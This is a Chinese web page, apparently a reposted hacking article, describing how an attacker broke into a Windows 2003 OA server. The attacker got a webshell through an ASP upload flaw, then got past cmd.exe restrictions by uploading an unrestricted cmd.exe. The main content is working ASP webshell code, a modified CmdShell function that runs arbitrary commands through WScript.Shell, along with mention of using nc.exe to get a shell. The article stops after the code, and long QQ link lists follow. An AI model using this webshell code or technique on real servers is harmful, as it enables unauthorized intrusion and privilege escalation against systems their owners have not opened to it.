本分类排行榜:
本分类好评榜:
服务器上运行的第三方软件历来就被攻击者们看作是入侵目标系统的捷径。现在,著名的腾讯QQ又被列入了这些捷径名单,好在QQ并不是服务器必备的软件之一,所以相信不会造成大范围的危机。文中遇到特殊情况虽然不多,但大家还是应该遵照“可能的就应该防范”的原则做出相应防御。
一、在Windows2003中得到的webshell
此次渗透的目标是一台OA办公系统服务器。其操作系统新近升级到了Windows2003,但OA仍存在asp文件上传漏洞,所以webshell的取得并没有任何悬念。阻碍是在权限提升时遇到的。
登陆webshell后发现只能查看服务器的D盘,对C盘不能进行任何访问,webshell的提示是“没有权限”。这点早在意料之中,因为wenshell只有guests组权限,再加上win2003默认禁止了“Everyone"匿名用户及“Guest"组权限用户访问cmd.exe,还造成了不能通过webshell运行cmd.exe。
唯一值得庆幸的是利用Webshell 可以对D盘(存放有web虚拟目录)各个子目录进行读写。这里除了web虚拟目录还有一些数据备份文件和一个腾讯QQ安装目录Tencent。
二、*破*解*Serv-u的终极防范
Windows2003的种种默认安全配置展示了它强大的一面,近一步提升现有权限似乎已不太可能,直到我试图从系统入手向这台服务器发出FTP链接请求并看到Serv-u的banner时才觉得又有了一线希望。
前面提到由于Windows2003对cmd.exe的权限限制,通过webshell方式不能运行cmd.exe,这样的论断在2004年6期的防线的《构建Windows2003堡垒主机》一文也曾提到,但实践表明这并不正确,通过webshell上传本地非2003系统中未受限制的cmd.exe文件到可执行目录,再通过wscript组件,同样能够通过webshell方式在Windows2003下获得相应权限的cmd.exe。结合nc.exe,甚至还能得到一个guest组权限的命令行下的shell。
为此,我对老兵的站长助手6.0做了一些改进,增加了如下代码,使其能够利用Wscript.shell组件运行本地上传的cmd.exe。Function CmdShell()
If Request("SP")<>"" Then Session("ShellPath") = Request("SP")
ShellPath=Session("ShellPath")
if ShellPath="" Then ShellPath = "cmd.exe"
if Request("wscript")="yes" then
checked=" checked"
else
checked=""
end if
If Request("cmd")<>"" Then DefCmd = Request("cmd")
SI="<form method=’post’><input name=’cmd’ Style=’width:92%’ class=’cmd’ value=’"&DefCmd&"’><input type=’submit’ value=’运行’>"
SI=SI&"<textarea Style=’width:100%;height:500;’ class=’cmd’>"
If Request.Form("cmd")<>"" Then
if Request.Form("wscript")="yes" then
Set CM=CreateObject(ObT(1,0))
Set DD=CM.exec(ShellPath&" /c "&DefCmd)
aaa=DD.stdout.readall
SI=SI&aaa
else%>
<object runat=server id=ws scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<object runat=server id=ws scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<object runat=server id=fso scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
<%szTempFile = server.mappath("cmd.txt")
Call ws.Run (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)
Set fs = CreateObject("Scripting.FileSystemObject")
Set oFilelcx = fs.OpenTextFile (szTempFile, 1, False, 0)
aaa=Server.HTMLEncode(oFilelcx.ReadAll)
oFilelcx.Close
Call fso.DeleteFile(szTempFile, True)
SI=SI&aaa
end if
End If
SI=SI&chr(13)&"</textarea>"
SI=SI&"SHELL路径:<input name=’SP’ value=’"&ShellPath&"’ Style=’width:70%’> "
SI=SI&"<input type=’checkbox’ name=’wscript’ value=’yes’"&checked&">WScript.Shell</form>"
Response.Write SI
End Function
频道推荐
- 8款经典个性动态皮肤代码
- 手机QQ2007正式发布!
- 你快点帮我踩空间去
- 为地震人民祈祷
- 注册Globe7,得QQ红钻、黄钻、绿
- QQ资料美化各种符号 之 综合感情
- 腾讯QQ 居安也不能不思危
- 非主流个性繁体字QQ签名:爱的连
- 500年才能换来今世的友情
- 三全面点坊送免费QQ秀 每天前500
- 非主流繁体字QQ名字大全
- 繁体字非主流个性QQ名字
- 不顾一切的爱你
- QQ爱情个性签名-逃不过那回忆的枷
- 二款女孩子专用的免费QQ秀(半年
- 快乐西游(粉红)QQ皮肤下载
- 两亿游戏币买电脑 QQ三国金币当钱
- 制作超炫的QQ空间
- 祝祢在2008年里有“鼠”卜盡的快
- 4周年站庆:写祝福免费拿Q币第三
- 繁体字QQ情侣网名_1.輩孒de約啶、
- 我来踩空间,快快请安
- 非主流时尚QQ签名 - 擢清莲而不妖
- 2008年最新留言代码:我只想要一
- 好多朋友到的最终幻想皮动画皮肤
- 未被TX关闭的免费粉色QQ空间皮肤
- 女生经典QQ签名 - 用整条生命、展
- 非主流个性签名-終亍倁檤,莪乜岢
- 音速道具场玩法总结
- QQ书签不被人注意的八项新功能推
- QQ学堂版经典QQ情侣个性签名(1)
- QQ繁体个性网名 - ο⒏继续无窷
- QQ繁体字个性签名:你牵动着我的
全站推荐
- 一对对繁体字情侣QQ名称
- 龙之谷游戏公测免费送1000份Q币,
- 慢慢学会习惯留言代码
- 打了个小松鼠
- “重复听着这首歌进入美梦”QQ空
- 繁体字个性游戏qq名字
- 成双成对的QQ名字昵称
- 无法阻止的爱恋 情侣互踩留言代码
- 时间是最残忍和最仁慈的礼物
- 我们的幸福别人只有羡慕的份 情侣
- 总是会出了奇的想念你 好看的彩色
- 倾尽灵魂独舞只待幸福落幕伤感留
- 我爱你不只是说说而已爱情彩色留
- 给我一个角落以便舔舐伤口
- 思念某一种温度心情留言代码
- 痴痴的等着你伤心留言代码
- 踩死你不负责的哟图形符号互踩代
- 偶DE心里只有你心形爱情留言代码
- 现实SHI因爲那首只有我们知道歌
- 只是学会了如何去伪装
- ⒉o11年、莪要、_ 莪们﹏茬?起
- 這個季節是屬於我們的幸福情侣留
- 花逝花开的美丽从不属于我
- 如果流泪可以震撼你 乐意哭到让你
- 爱得如此的卑微是前所未有的累
- 如果明天的路你不知道该往哪走 僦
- 謊言一直存在,信任只會換來背叛
- 幸福、可不可以像摩天輪一樣。每
- 我向星星許了個願
- 我们不可更改的宿命
- 一段优美的伤感火星文留言代码
- 情侣留言代码:宝宝、迩1定要幸福
- 彩色情侣留言代码:宝贝,请相信
- 你就像一个白痴彩色留言代码
- 情侣图形留言代码:我只想俩個人
- 涐一直在奢望他旳停留
- qq图形主人寄语代码 给我一片天空
- 该怎么做结局才能不寂寞
- 悲伤留言:该怎么遗忘这出满是傷
- 美丽从不属于我 悲伤难过却一直存
- 伤心繁体字个性QQ名字
- “理智遇到爱情便丢盔弃甲”qq空
- 你给的爱我一直很坚定、很依赖、
- 繁体字个性游戏qq名字
- 美丽从不属于我 悲伤难过却一直存
